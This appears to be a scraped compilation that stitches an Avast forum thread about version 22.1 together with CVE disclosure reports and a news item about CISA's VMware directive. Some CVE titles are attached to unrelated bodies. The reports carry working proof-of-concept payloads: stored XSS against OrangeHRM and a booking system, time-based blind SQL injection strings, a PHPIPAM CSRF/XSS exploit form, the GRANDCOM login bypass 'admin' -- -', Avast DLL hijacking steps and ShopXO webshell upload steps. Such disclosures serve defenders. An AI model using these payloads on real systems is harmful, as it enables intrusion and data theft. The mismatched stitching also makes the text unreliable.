An arbitrary file write vulnerability in Avast Premium Security before v21.11.2500 (build 21.11.6809.528) allows attackers to cause a Denial of Service (DoS) via a crafted DLL file.

** Topic: NEW Avast Version 22.1 (January 2022)  (Read 9757 times)**

0 Members and 1 Guest are viewing this topic.

Hi, all. Please welcome the newest version of **Avast AV: 22.1** (22.1.2504)

_Notable improvements in the release:_

*   **Wi-Fi Inspector Password Hints** - Wi-Fi Inspector can now recommend more secure passwords for your home network
*   **Firewall improvements in the UI** - We've re-ordered the Firewall Tabs inside the interface
*   **Boot Time Scan Results** - You'll notice how from now on you get actual results from scans even after reboots

_Some bugfixes we worked on:_

*   Rootkit driver BSOD was fixed
*   User Interface password now works fine, doesn't get removed after update
*   And many more...

The first release of the year! Thank you to our team for the great effort!  
**How to install:**  
1\. Update from your existing Avast version via Settings -> Update -> Update program  
2\. Or you can download and install files:  
_Online installers (recommended):_

*   Free: https://bits.avcdn.net/insttype\_FREE
*   Premium Security: https://bits.avcdn.net/insttype\_APR

_Offline installers:_

*   Free: https://files.avast.com/iavs9x/avast\_free\_antivirus\_setup\_offline.exe
*   Premium Security: https://files.avast.com/iavs9x/avast\_premier\_antivirus\_setup\_offline.exe

(In case the hyperlink here wouldn't work in your browser, just paste and copy the URL to the browser address bar)

« _Last Edit: February 09, 2022, 06:48:17 AM by Karel Šťavík_ »

 Logged

Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.

 Logged

Thanks, spreading the news... 

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Thanks for the new release 

 Logged

**Main:** Win10 Pro 21H2 64bit / Core i5-7400 3.0GHz / 16GB RAM / Avast 22 Premium _**Beta(Icarus)**_ / Comodo Firewall (testing again)  
**Mobile:** Win10 Pro 21H1 64bit / Core i5-3340M 2.7GHz / 8GB RAM / Avast 21 Free / Windows Firewall Control

**Avast の設定について解説しています。**よろしければご覧ください。

Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?

 Logged

> Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  

Update

 Logged

> > Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  
> 
> Update  

Looks like the "version" should be Avast AV: 22.1 (22.1.6921).

\-dwh

 Logged

> Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.  

Avast shows enlightened self-interest and respect by taking note of the obervations of users.  Not to do so shows contempt for users.  To ignore users' views is tantamount to cutting off their own noses to spite their faces.  I wander off the Avast path from time to time.  The experience of that makes me respect Avast all the more.  The little popups are a price well worth paying.

 Logged

Windows 10 Pro x64, Avast Free 22.3.6008, Malwarebytes Anti-Exploit, Malwarebytes Anti-Ransomware

The free version doesn't have a firewall does it?

 Logged

 Logged

> The free version doesn't have a firewall does it?  

On Avast Free Antivirus (not Avast One Essentials), No it isn't, the two products are different.   
Don't I recall you trying Avast One and going back  ?

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

There's **Avast Free** and then there is  
**Avast One Essential**  
Both a free but different products.

 Logged

> The free version doesn't have a firewall does it?  

Hi, it does (since a few months).

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

> > The free version doesn't have a firewall does it?  
> 
> Hi, it does (since a few months).  

It isn't installed by default, but can be downloaded from the UI (I'm still on version 21.11.xxxx). 

Though I guess from a clean install it would be unless you didn't opt for a custom install.

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

It's an option that needs to be selected in a custom install  
as explained here: https://youtu.be/IxozZFC9XRk  
You can also select it later by using the option in  
troubleshooting to modify what you've installed.

 Logged

CVE-2022-28964: NEW Avast Version 22.1 (January 2022)

A stored cross-site scripting (XSS) vulnerability in the addNewPost component of OrangeHRM v4.10.1 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

**Environment details**  
OrangeHRM version: 4.10.1  
OrangeHRM source: Release build from Sourceforge or Git clone  
Platform: Ubuntu  
PHP version: 7.3.33  
Database and version: MariaDB 10.3  
Web server: Apache 2.4.52

If applicable:  
Browser: Firefox

**Describe the bug**  
Insufficient input validation in Buzz - addNewPost API results in Stored Cross Site Scripting attack. An attacker - who is an authenticated user - can craft a malicious request causing malicious Javascript to execute in the browser of any other user. The malicious Javascript can trigger when a victim user visits the Buzz page.

**To Reproduce**

1.  Authenticate to the user dashboard.
2.  Visit 'Buzz' page
3.  Collect the CSRF token from the HTML response. It can be found in an 'input' field with the id createPost__csrf_token. Example :

    <input type="hidden" name="createPost[_csrf_token]" value="8d7f3ee80979a1360fb445a6ffa1ffec" id="createPost__csrf_token">
    

4.  Collect the logged in user cookie _orangehrm
5.  Fire the following POST request including the CSRF token and cookie obtained. Replace the Host header too :

    POST /symfony/web/index.php/buzz/addNewPost HTTP/1.1
    Host: 1.2.3.44
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 173
    Origin: http://54.165.4.147
    Connection: close
    Cookie: Loggedin=True; _orangehrm=qod7ejr1fqjtvtnm27i62ltcrb
    
    createPost%5Bcontent%5D=content&createPost%5BlinkAddress%5D=javascript:alert(1221)&createPost%5BlinkTitle%5D=xss&createPost%5BlinkText%5D=&createPost%5B_csrf_token%5D=cb38d12166e154ded1869000c43c1ea5
    

6.  Click on the link 'xss' in the most recent post.

**Expected behavior**  
The value of parameters createPost[linkTitle] and createPost[linkAddress] should be validated by API and an error should be thrown.

**What do you see instead:**  
The malicious payload gets submitted successfully and get's stored in the posting made by the user.

**Screenshots**

  

**Technical Details**  
A logged in user can post status updates to their buzz feed. From the front-end application a user will be able to post a text within a single field which says "What's on your mind" to the buzz feed. This happens via a POST request to the URL /symfony/web/index.php/buzz/addNewPost through the createPost[content] request body parameter. While investigating this API, we found that there are extra parameter fields in the body of this API which is not directly exposed through the frontend application.

The following request body parameters found in the API results certain profound effects in the HTML response sent by server:

1.  createPost[linkAddress]
    
    Causes the addition of an <a> anchor tag in response with id linkTitle & with attribute src with the value set for createPost[linkAddress] parameter.
    
2.  createPost[linkTitle]
    
    Causes an <a> anchor tag in response with id linkTitle which is click able and displayed with the text content sent in the above request parameter.
    

Combining the above 2 parameters, it's possible to get an anchor HTML tag with a visible clickable text and a desired URL as src which is clickable.

The URL payload could be javascript as javascript:alert(121). This can result in execution of arbitrary malicious javascript code on the client side if the victim clicks on this link.  
The impact of this can be severe since this particular code gets stored in the database and gets delivered to the feed of every logged-in user in orangeHRM. Every user will have this delivered through their 'Buzz' feed.

In terms of impact, this vulnerability enables an attacker to stealing CSRF token and perform arbitrary actions on the website on behalf of the victim user.

CVE-2022-28985: Stored XSS in "Update Status" section under "OrangeBuzz" via the GET/POST parameters `createPost[linkTitle]` and `createPost[linkAddress]` · Issue #1217 · orangehrm/orangehrm

Multiple DLL hijacking vulnerabilities via the components instup.exe and wsc_proxy.exe in Avast Premium Security before v21.11.2500 allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via a crafted DLL file.

**CVE-2022-AVAST2 (Self-Defense Bypass via Repairing Function)****Product**

Avast - Premium Security

**Version**

21.11.2500 (build 21.11.6809.528)

**Vulnerable Component**

"instup.exe" and "wsc\_proxy.exe"

**Description**

It was noted that there is security checking to prevent some of the Avast processes from loading of undesired/unsigned DLLs via DLL hijacking attack.

However, It was noted that there are two Avast processes "instup.exe" and "wsc\_proxy.exe" which are vulnerable to DLL hijacking vulnerability. These processes will attempt to load an non-existing DLL (i.e., wbemcomn.dll) from "C:\\Windows\\System32\\wbem" when "REPAIR APP" function is triggered. Due to the lack of security checking within these two processes, attackers who have administrative privilege could drop a malicious version of "wbemcomn.dll" and get it loaded by the affected Avast processes.

Since those vulnerable components are Avast protected processes, attacker could inject malicious code to control the Avast protected processes for malicious purposes such as deactivating the antivirus and staging malware.

**Impact**

The vulnerability allows an attacker with administrative privilege to execute malicious code within Avast process, terminate the Avast antivirus regardless of "Self-Defense" protection and cause DOS to the affected system.

**Steps to reproduce**

1.  Install Avast Premium Security (version 21.11.2500)
2.  Open a Administrative CMD prompt and copy the malicious version of "wbemcomm.dll" to "C:\\Windows\\System32\\wbem"
3.  Open Avast Premium Security GUI -> Menu -> Settings -> Troubleshooting -> Click on "REPAIR APP"
4.  Wait for a while and the malicious "wbemcomm.dll" will be loaded by "instup.exe" and "wsc\_proxy.exe" (see poc.png)

**Resolution**

This vulnerability is patched since Avast Premium Security 22.2.

**Disclosure Timeline**

20-01-2022 Vulnerability reported to Avast.

11-02-2022 Avast confirmed the vulnerability and released a patch for the product.

**References**

https://forum.avast.com/index.php?topic=318305.0

CVE-2022-28965: Vulnerability-Disclosure/CVE-2022-AVAST2 at main · netero1010/Vulnerability-Disclosure

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=delete_client.

    #### Title: Online Sports Complex Booking System 1.0 SQL Injection#### Author: Zllggggg#### Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html#### Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip####  Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20SQL%20Injection(%E4%BA%8C).md#### Tested on: Windows, MySQL, ApacheAfter entering the background, click the registered clients navigation, select a piece of data and click delete[image: 1648884355.jpg]Find the corresponding source code and find that the ID parameter passed bypost does not have any filtering[image: 1648884613.jpg]The vulnerability is also verified in sqlmap [image: 1648884408.jpg]Data packet```POST /scbs/classes/Users.php?f=delete_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 4Origin: http://localhostConnection: closeReferer: http://localhost/scbs/admin/?page=clientsCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=2```Payload```Parameter: id (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 4836 FROM (SELECT(SLEEP(5)))QbFZ) AND'aPSM'='aPSM---```

CVE-2022-28962: Online Sports Complex Booking System 1.0 SQL Injection ≈ Packet Storm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=save_client.

    Title: Online Sports Complex Booking System 1.0 XSSAuthor: ZllgggggVendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.htmlSoftware: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zipReference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.mdTested on: Windows, MySQL, ApacheDescription:When registering users at the front desk, when we fill in the information,we use burpsuite to catch the data packet,After obtaining the data packet,modify the email parameter to <script>alert(1)</script> then send thepacket,Then log in to the background with the administrator account ,Clickregistered clients to trigger the pop-up windowData packetPOST /scbs/classes/Users.php?f=save_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------289647566033806702832762971625Content-Length: 1284Origin: http://localhostConnection: closeReferer: http://localhost/scbs/register.phpCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="id"1-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="firstname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="middlename"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="lastname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="gender"Male-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="contact"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="address"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="email"<script>alert(1)</script>-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="password"123-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="img"; filename=""Content-Type: application/octet-stream-----------------------------289647566033806702832762971625--

CVE-2022-29652: Online Sports Complex Booking System 1.0 Cross Site Scripting ≈ Packet Storm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /classes/master.php?f=delete_ Facility.

**Title: Online Sports Complex Booking System 1.0 SQL Injection****Author: Zllggggg****Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html****Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs\_1.zip****Tested on: Windows, MySQL, Apache**

After the program is installed, enter the background, find the facility list in the right navigation bar, select a piece of data, and click the delete button 

According to the submission path /classes/master.php?f=delete\_ Facility, Find delete\_facility(),The ID parameter does not have any filtering,Therefore, SQL injection is caused 

Because the parameters are submitted in post mode,Use burpsuite to intercept and save it as a TXT file,Then use sqlmap to verify sqlmap -r 2.txt 

Data packet

    POST /scbs/classes/Master.php?f=delete_facility HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 4
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/scbs/admin/?page=facilities
    Cookie:PHPSESSID=t261ncguifvbucmfe31v6l74km
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    id=1
    

Payload

    Parameter: id (POST)
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1' AND (SELECT 4984 FROM (SELECT(SLEEP(5)))KDjE) AND 'riWF'='riWF

CVE-2022-29304: Exploit-/Online Sports Complex Booking System 1.0 SQL Injection(三).md at main · playZG/Exploit-

PHPIPAM version 1.4.4 suffers from cross site request forgery and cross site scripting vulnerabilities.

=====[ Tempest Security Intelligence - ADV-03/2022  
]==========================

PHPIPAM - Version 1.4.4

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents ]==================================================

* Overview  
* Detailed description  
* Timeline of disclosure  
* Thanks & Acknowledgements  
* References

=====[ Vulnerability Information  
]=============================================

* Class: Improper Neutralization of Input During Web Page Generation  
('Cross-Site Scripting') [CWE-79]  
* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

* Class: Cross-Site Request Forgery (CSRF) [CWE-352]  
* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

=====[ Overview ]========================================================

 * System affected: PHPIPAM - Version 1.4.4  
 * Software Version: Version 1.4.4 (other versions may also be affected).  
 * Impact: PHPIPAM 1.4.4 is vulnerable to Cross-Site Request Forgery (CSRF)  
and Cross-Site Scripting (XSS) via  
app/admin/subnets/find_free_section_subnets.php. An attacker can exploit  
this by injecting javascript code to coerce an admin user into performing  
unintended actions.

=====[ Detailed description  
]=================================================

The html codes below exploit vulnerabilities in the same way due to the  
fact that both forms do not contain CSRF tokens and are vulnerable to XSS  
attacks. Then an attacker can host the forms on their malicious host and  
trick an administrator into visiting your page. If successful, the  
javascript code will execute.

* [app/admin/subnets/find_free_section_subnets.php]

<html>  
  <body>  
    <h1> Exploit PHPIPAM </h1>  
  <script>history.pushState('', '', '/')</script>  
    <form action="  
http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php"  
method="POST">  
      <input type="hidden" name="container" value="body" />  
      <input type="hidden" name="placement" value="top" />  
      <input type="hidden" name="sectionid" value="2'><input  
onpointerleave="alert(1)">rodnt</input><script>alert('incogbyte')</script>"  
/>  
      <input type="hidden" name="original-title" value="Search for free  
subnets in section " />  
      <input type="submit" value="Exploit" />  
    </form>  
  </body>  
</html>

=====[ Timeline of disclosure  
]===============================================

13/Jan/2022 - Responsible disclosure was initiated with the vendor;

14/Jan/2022 - PHPIPAM confirmed the issues;

17/Jan/2022 - The vendor fixed the issues XSS and CSRF;

24/Mar/2022 - CVE reserved as CVE-2021-46426;

25/Mar/2022 - CVE assigned [5].

=====[ Thanks & Acknowledgements ]========================================

* Tempest Security Intelligence [4]

=====[ References ]=====================================================

[1] [  
https://cwe.mitre.org/data/definitions/352.html|https://cwe.mitre.org/data/definitions/352.html  
]

[2] [  
https://cwe.mitre.org/data/definitions/79.html|https://cwe.mitre.org/data/definitions/79.html  
]

[3] [  
https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351|https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351  
]

[4] [https://www.tempest.com.br|https://www.tempest.com.br/]

[5] [  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426  
]

[6][ Thanks to Celso (CGB) =)]

=====[ EOF ]===========================================================

--

PHPIPAM 1.4.4 Cross Site Request Forgery / Cross Site Scripting

GRANDCOM DynWEB before 4.2 contains a SQL Injection vulnerability in the admin login interface. A remote unauthenticated attacker can exploit this vulnerability to obtain administrative access to the webpage, access the user database, modify web content and upload custom files. The backend login script does not verify and sanitize user-provided strings.

**Authentication Bypass in GRANDCOM CMS**

*   Vendor Homepage: https://www.grandcom.sk/
*   Affected Version: 4.2 and older

SQL injection vulnerability in GRANDCOM CMS allows remote unauthenticated attackers to bypass authentication via a crafted username during a login attempt. Any unauthorized user with access to the application is able to exploit this vulnerability.

> SQL Injection attack consists of inserting an SQL query through the input data from the client into the application. Upon successful misuse, it is possible to retrieve detailed data from the database, edit database data such as inserting, updating or deleting data, work with administrative operations in the database, or in some situations run commands directly on the operating system.

**Steps to reproduce**

1.  Visit the following resource /admin/index.php.
2.  Enter the below mentioned credentials in the vulnerable field:

*   username: admin' -- -
*   password: _anything_

5.  Press the **Login** button, this will result in a successful Authentication Bypass.

**Remediation**

*   Use of Prepared Statements (with Parameterized Queries)
*   Use of Stored Procedures
*   Allow-list Input Validation
*   Escaping All User Supplied Input

Discovered by Martin Kubecka, July 19, 2021.

CVE-2021-37413: CVE-References/CVE-2021-37413.md at main · martinkubecka/CVE-References

CISA orders US federal agencies to implement patches ASAP

John Leyden 19 May 2022 at 15:14 UTC

CISA orders US federal agencies to implement patches ASAP

US Federal agencies have been instructed to either immediately patch or temporarily deactivate a set of enterprise products from VMware in response to “active and expected exploitation of multiple vulnerabilities”.

An emergency directive from the US Cybersecurity and Infrastructure Security Agency (CISA) urges patching of VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

If prompt patching is impractical then federal agencies are instructed to remove instances of vulnerable products from agency networks.

**Act fast**

Attackers have reverse engineered recently disclosed software vulnerabilities in the various VMware products in order to develop exploits and attack unpatched systems.

The tactic has already resulted in active exploitation of CVE-2022-22954 and CVE-2022-22960, with more abuse along the same lines likely to follow.

YOU MIGHT ALSO LIKE Popular websites leaking user email data to web tracking domains

“Based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973, which were disclosed by VMware on May 18, 2022,” an alert from the agency warns.

In a related advisory issued by VMware on Wednesday (May 18), the vendor explained that it had patched an authentication bypass vulnerability (CVE-2022-22972) and a local privilege escalation vulnerability (CVE-2022-22973) involving VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

The CVE-2022-22954 vulnerability already under active attack involves a server-side template injection vulnerability in VMware Workspace ONE Access and Identity Manager that poses a remote code execution risk. The flaw earned a CVSS score of 9.8, close to the maximum possible.

Catch up on the latest cyber-attack news

The CVE-2022-22960 flaw involves a lesser but still high-risk privilege escalation vulnerability involving VMware Workspace ONE Access, Identity Manager, and vRealize Automation.

Both flaws have come under active attack, just days after the release of patches, security vendor Barracuda Networks reports:

The vast majority of the attacks came in from the US geographically, with most of them coming in from data centers and cloud providers. While the spikes are largely from these IP ranges, there are also consistent background attempts from known bad IPs in Russia. Some of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes.

The motive behind the attacks remains unclear.

Although the unusual emergency action advisory is primarily directed at US federal agencies, CISA is urging other enterprise organizations to either update or remove installations of the affected products from their networks.

Vulnerable, internet-accessible installations of affected products should be treated as already potentially compromised, CISA adds.

RECOMMENDED Rogue cloud users could sabotage fellow off-prem tenants via critical Flux flaw

Active attacks against VMware flaws prompts emergency update directive

An issue was discovered in ShopXO CMS 2.2.0. After entering the management page, there is an arbitrary file upload vulnerability in three locations.

Affects version shopxo 2.2.0  
After entering the management page as admininstrator there is an arbitrary file upload vulnerability in 3 locations , you can upload webshell into the site.

**The first location:**

网站管理->主题管理->主题安装  
the post url is /admin.php?s=theme/upload.html  
the step is:

1.  download the default theme from offical(https://shopxo.store/goods-80.html)
2.  unzip the zip
3.  Only delete files with "php" suffix due to file security check, new a evil file named phpinfo.pHp or phpinfo.phtml in the "css" folder and the root folder  
      
    
4.  Recompress the file as a new zip file
5.  upload it  
    you will find the evil file is in public/static/index/<your renamed folder name>/css/phpinfo.pHp and app/index/view/<your renamed folder name>/phpinfo.pHp  
    

**The second location:**

应用中心->应用管理->上传应用  
the post url is /admin.php?s=pluginsadmin/upload.html  
like the first location

1.  download a casual plugin from offical(https://shopxo.store/goods-75.html) like this
2.  unzip the zip
3.  new a evil file named phpinfo.php in the _controller_-><pluginname>->admin folder
4.  Recompress the file as a new zip file
5.  upload it

you will find the evil file is in app/plugins/freightfee/admin/phpinfo.php

**The third location:**

手机管理->小程序列表->主题安装  
the post url is /admin.php?s=appmini/themeupload.html

the step is

1.  new a evil file phpinfo.php and compress the file as a new zip file
2.  upload it

you will find the evil file in sourcecode/weixin/phpinfo.php

Tag

#php